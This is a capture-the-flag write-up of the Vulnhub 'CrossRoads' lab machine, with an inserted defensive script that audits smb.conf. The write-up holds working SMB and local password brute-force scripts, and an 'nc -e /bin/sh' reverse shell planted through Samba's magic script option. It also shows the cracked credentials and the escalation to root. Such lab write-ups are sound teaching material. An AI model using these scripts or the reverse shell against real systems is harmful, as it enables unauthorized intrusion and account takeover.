Welcome to the CrossRoads writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
CrossRoads
Platform: Vulnhub
Difficulty: Easy
OS: Linux
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:45 CET
Nmap scan report for 192.168.1.152
Host is up (0.0027s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,139,445 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:46 CET
Nmap scan report for 192.168.1.152
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 2.6.32 - 3.10 (93%), Linux 3.4 - 3.10 (92%), Synology DiskStation Manager 5.2-5644 (91%), Netgear RAIDiator 4.2.28 (91%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 2.6.32 - 2.6.35 (91%), Linux 2.6.32 - 3.5 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CROSSROADS
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2021-03-24T03:46:54-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-24T08:46:54
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 0.30 ms SupTecnico.mshome.net (172.22.192.1)
2 1.40 ms 192.168.1.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
Gobuster
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.152/ -x php,txt,html,bak
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.152/
[+] Threads: 10
[+] Wordlist: directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: bak,php,txt,html
[+] Timeout: 10s
===============================================================
2021/03/24 09:32:27 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/note.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/24 09:39:43 Finished
===============================================================
OK, the web server hosts a file called note.txt, let's see it.
# curl http://192.168.1.152/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu
And now, let's enumerate SMB.
SMB
# enum4linux -a 192.168.1.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 24 18:08:42 2021
==========================
| Target Information |
==========================
Target ........... 192.168.1.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
..........................................................................
..........................................................................
============================
| Users on 192.168.1.152 |
============================
index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: albert Name: Desc:
user:[albert] rid:[0x3e9]
..........................................................................
..........................................................................
[+] Found domain(s):
[+] CROSSROADS
[+] Builtin
..........................................................................
..........................................................................
======================================================================
| Users on 192.168.1.152 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
Well, among all the information obtained we have a user called albert. Let's see if we can obtain his password by brute force.
Exploitation
We are going to write a small script to perform brute force.
#!/usr/bin/env python3
from smb.SMBConnection import SMBConnection  # pysmb

host = '192.168.1.152'
user = 'albert'

# Try each candidate password from the wordlist until the server accepts an SMB session
with open('/usr/share/wordlists/rockyou_utf8.txt', 'r', errors='ignore') as passList:
    for passwd in passList:
        passwd = passwd.strip()
        conn = SMBConnection(user, passwd, 'pycon', host, use_ntlm_v2=True, domain='',
                             sign_options=SMBConnection.SIGN_WHEN_SUPPORTED, is_direct_tcp=True)
        # connect() returns True only when authentication succeeded
        if conn.connect(host, 445):
            print("[+] User Credentials Successful: " + user + ":" + passwd)
            conn.close()
            exit(0)
        print("[-] Login Failed for: " + user + ":" + passwd)
And let's run it!
# python3 smbbruter.py
[-] Login Failed for: albert:123456
[-] Login Failed for: albert:12345
[-] Login Failed for: albert:123456789
..........................................................................
..........................................................................
[+] User Credentials Successful: albert:bradley1
Perfect, let's see what shared resources the user has.
# smbclient -L //192.168.1.152 -U albert
Enter WORKGROUP\albert's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbshare Disk
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
albert Disk Home Directories
SMB1 disabled -- no workgroup available
And now, we are going to explore the albert share.
# smbclient //192.168.1.152/albert -U albert
Enter WORKGROUP\albert's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Mar 6 13:45:15 2021
.. D 0 Tue Mar 2 23:00:47 2021
smbshare D 0 Tue Mar 2 23:16:13 2021
crossroads.png N 1583196 Tue Mar 2 23:34:03 2021
beroot N 16664 Wed Mar 3 00:02:41 2021
user.txt N 1805 Sun Jan 3 18:56:19 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> get user.txt
getting file \user.txt of size 1805 as user.txt (97,9 KiloBytes/sec) (average 97,9 KiloBytes/sec)
smb: \> get beroot
getting file \beroot of size 16664 as beroot (428,2 KiloBytes/sec) (average 322,1 KiloBytes/sec)
smb: \> cd smbshare
smb: \smbshare\> ls
. D 0 Tue Mar 2 23:16:13 2021
.. D 0 Sat Mar 6 13:45:15 2021
smb.conf N 8779 Tue Mar 2 23:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \smbshare\> get smb.conf
getting file \smbshare\smb.conf of size 8779 as smb.conf (1428,9 KiloBytes/sec) (average 429,2 KiloBytes/sec)
Get user flag
# cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
# cat smb.conf
..........................................................................
..........................................................................
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
We can see that the magic script parameter is set to smbscript.sh. In Samba this option names a file that the server executes, as the connected user, as soon as a client writes it to the share and closes it, so we should be able to create that script and upload it to the share next to the smb.conf file to run our script and thus get a reverse shell. Let's try.
We need to create smbscript.sh with the reverse shell.
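A setting like this is what a configuration review should catch before anyone needs a writeup. The following is an added example of my own, not code from the original post: it parses an smb.conf and flags shares that combine magic script with write access, or guest access with write access. The sample configuration is constructed here, modelled on the [smbshare] section above, with a second made-up share for comparison.

```python
import re
# Constructed input (hypothetical): [smbshare] mirrors the settings shown in the
# writeup; [backup] is a second share made up here for comparison.
SAMPLE_SMB_CONF = """
[smbshare]
   path = /home/albert/smbshare
   writable = yes
   read only = no
   magic script = smbscript.sh
   guest ok = no
[backup]
   writable = yes
   guest ok = yes
"""
YES = ("yes", "true", "1")

def parse_smb_conf(text):
    """Minimal smb.conf parser: [section] headers, key = value lines, # or ; comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def is_writable(share):
    """'writable = yes' (alias 'writeable') and 'read only = no' are synonyms; Samba defaults to read only."""
    if share.get("writable", share.get("writeable", "")).lower() in YES:
        return True
    return share.get("read only", "yes").lower() in ("no", "false", "0")

def audit_shares(sections):
    """Return (severity, share, reason) tuples. A 'magic script' file written by a client is
    executed server-side as the connected user, so on a writable share it is code execution."""
    findings = []
    for name, share in sections.items():
        if name == "global":
            continue
        if "magic script" in share:
            findings.append(("HIGH" if is_writable(share) else "MEDIUM", name, "magic script = " + share["magic script"]))
        if is_writable(share) and share.get("guest ok", "no").lower() in YES:
            findings.append(("HIGH", name, "writable share open to unauthenticated guests"))
    return findings
```

Run it against a real /etc/samba/smb.conf by reading the file into parse_smb_conf; any HIGH finding on a share reachable by untrusted users is worth fixing before the box is exposed.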
# cat smbscript.sh
nc -e /bin/sh 192.168.1.100 8787
And now, upload it to SMB with a terminal listening.
smb: \smbshare\> put smbscript.sh
And... got shell!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.152] 35112
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
Post exploitation
Enumeration
albert@crossroads:/home/albert$ wget 192.168.1.100/rockyou_utf8.txt
--2021-03-24 13:36:06-- http://192.168.1.100/rockyou_utf8.txt
Connecting to 192.168.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 140056880 (134M) [text/plain]
Saving to: ‘rockyou_utf8.txt’
rockyou_utf8.txt 100%[=======================================================================================================================================>] 133.57M 150MB/s in 0.9s
2021-03-24 13:36:07 (150 MB/s) - ‘rockyou_utf8.txt’ saved [140056880/140056880]
albert@crossroads:/home/albert$
#!/usr/bin/env python3
import subprocess

# Feed each wordlist entry to ./beroot on stdin and stop at the first one it does not reject.
# Passing the password via stdin (instead of echo inside a shell string) avoids breaking on
# quotes and other shell metacharacters that rockyou entries contain.
with open('rockyou_utf8.txt', 'r', errors='ignore') as passList:
    for passwd in passList:
        passwd = passwd.strip()
        result = subprocess.run(['./beroot'], input=passwd + '\n', capture_output=True,
                                text=True, errors='replace')
        response = result.stdout + result.stderr
        if 'wrong password!!!' not in response:
            print('Password found: {}'.format(passwd))
            print("This is the output: \n{}".format(response))
            break
albert@crossroads:/home/albert$ python3 berootBruter.py
Password found: lemuel
enter password for root
-----------------------
do ls and find root creds
Great! We have the correct password, and the program now tells us to run ls to find the credentials. Listing the directory shows a new file called rootcreds. Let's read it and authenticate as root.
albert@crossroads:/home/albert$ ls
beroot berootBruter.py crossroads.png rockyou_utf8.txt rootcreds smbshare user.txt
albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___
root@crossroads:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@crossroads:/home/albert# cd /root
root@crossroads:~# ls
beroot.sh creds passwd root.txt
root@crossroads:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@crossroads:~#
It is entertaining, but it is too CTF-style for my liking. Anyway, nice box!